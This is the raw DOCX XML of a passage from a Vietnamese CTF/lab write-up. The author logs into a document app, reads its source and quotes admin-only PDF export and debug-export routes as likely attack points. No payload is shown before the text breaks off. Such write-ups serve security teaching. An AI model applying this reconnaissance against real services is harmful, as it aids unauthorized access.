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530BD1" w14:textId="7D8858F9" w:rsidR="00B3373B" w:rsidRDefault="00BC1FFA">
      <w:r w:rsidRPr="000121A8">
        <w:t xml:space="preserve">Truy cập vào địa chỉ URL được cung cấp trong đề bài. Sau khi truy cập, giao diện mặc định hiển thị một trang đăng nhập với các trường yêu cầu tên người dùng và mật </w:t>
      </w:r>
      <w:r>
        <w:t>khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3452A175" w14:textId="19894CC6" w:rsidR="0002152D" w:rsidRDefault="00DD0DAC">
      <w:r w:rsidRPr="00DD0DAC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE49312" wp14:editId="1DC9DFC8">
            <wp:extent cx="5731510" cy="2330450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9637314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731412" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2330450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569D54C" w14:textId="77777777" w:rsidR="004166C8" w:rsidRDefault="00BC1FFA">
      <w:r>
        <w:t xml:space="preserve">Thực hiện tạo tài khoản và </w:t>
      </w:r>
      <w:r w:rsidR="003D0F18">
        <w:t xml:space="preserve">đăng nhập vào hệ thống. </w:t>
      </w:r>
      <w:r w:rsidR="004166C8" w:rsidRPr="004166C8">
        <w:t xml:space="preserve">Sau khi đăng nhập thành công bằng thông tin tài khoản vừa tạo, hệ thống chuyển hướng đến giao diện chính của người dùng. Tại đây, chức năng tạo tài liệu được hiển thị rõ ràng thông qua nút “Create New Document”, cho phép người dùng khởi tạo nội dung mới trong hệ </w:t>
      </w:r>
      <w:r w:rsidR="004166C8">
        <w:t>thống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192D9A0" w14:textId="11E3A627" w:rsidR="00C13ED0" w:rsidRDefault="00C13ED0">
      <w:r w:rsidRPr="00C13ED0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30D0DA33" wp14:editId="1B2E3834">
            <wp:extent cx="5731510" cy="1728470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1451636886" name="Picture 1" descr="A black and red rectangle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636886" name="Picture 1" descr="A black and red rectangle with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1728470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DCBF17" w14:textId="0952BB2D" w:rsidR="000166A3" w:rsidRDefault="004166C8">
      <w:r>
        <w:t xml:space="preserve">Để thuận tiện hơn cho bài lab, trước tiên mình sẽ đọc qua source code để có thêm thông tin, và mình tìm thấy được có vài endpoint </w:t>
      </w:r>
      <w:r w:rsidR="00B918F0">
        <w:t xml:space="preserve">đáng chú ý </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">yêu cầu quyền </w:t>
      </w:r>
      <w:r w:rsidR="00B918F0">
        <w:t>admin:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9072" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="320"/>
        <w:gridCol w:w="8752"/>
      </w:tblGrid>
      <w:tr w:rsidR="000166A3" w:rsidRPr="000166A3" w14:paraId="526BDE05" w14:textId="77777777" w:rsidTr="00157097">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A030A7" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000166A3">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16775861" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B862F51" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D22B76" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ADA4394" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325F6C51" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11CB3A51" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C88F591" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4181BB" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="051ADCC5" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72943287" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:lastRenderedPageBreak/>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A635164" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F3635FC" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC1B10E" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB23BE0" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22AFFFC1" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54F360DC" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D7B848" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C56C43" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D71278" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EC4E0D" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027B1501" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46E17764" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AE21BA" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D50CAB6" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F7DA8C5" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C062C3" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19999A79" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C7E04F" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F5140F" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0F69BA" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D57DC29" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA5F7B2" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="001C4999" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58403591" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3253E45A" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:lastRenderedPageBreak/>
              <w:t>router.get(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="576C2F67" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/document/export/:id"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C637308" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  isAuthenticated,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E40FA55" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  isAdmin,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD0759B" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>async</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> (req, res) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="213C9646" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> { id } = req.params;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C5DC28A" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> user = req.user;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23FCEA12" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> document = findDocument(user.id, id);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AC8862" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> (!document) </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> res.status(404).send(</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Document not found"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF8FB41" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="63CBDCC7" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> content = nhm.translate(document.content);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE1BB47" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="54DA455E" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> generatedPDF = </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> generatePDF(content);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A4184A" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="3644B35D" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    res.set(</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Content-disposition"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"attachment; filename=generated.pdf"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A1C085" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    res.set(</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Content-Type"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"application/pdf"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C63579A" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> res.send(generatedPDF);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A248C02" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071BF322" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="564B20FD" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="1B3D683F" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t>router.post(</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/document/debug/export"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">, isAuthenticated, isAdmin, </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>async</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> (req, res) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD506AA" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> { access_pass, content } = req.body;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106D7011" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="5170FA84" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> (!verifyPass(access_pass)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76477896" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    rotatePass();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE9FC24" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve"> res.status(403).send(</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"BAD PASS, WHO ARE YOU STRANGER ?!"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617ACF69" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F73E349" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="5BE32FD3" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  res.set(</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Content-disposition"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"attachment; filename=generated.pdf"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35AE965B" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  res.set(</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Content-Type"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"application/pdf"</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05CAFFB2" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3"/>
          <w:p w14:paraId="57C012F3" w14:textId="77777777" w:rsidR="000166A3" w:rsidRPr="000166A3" w:rsidRDefault="000166A3" w:rsidP="000166A3">
            <w:r w:rsidRPr="000166A3">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="000166A3">
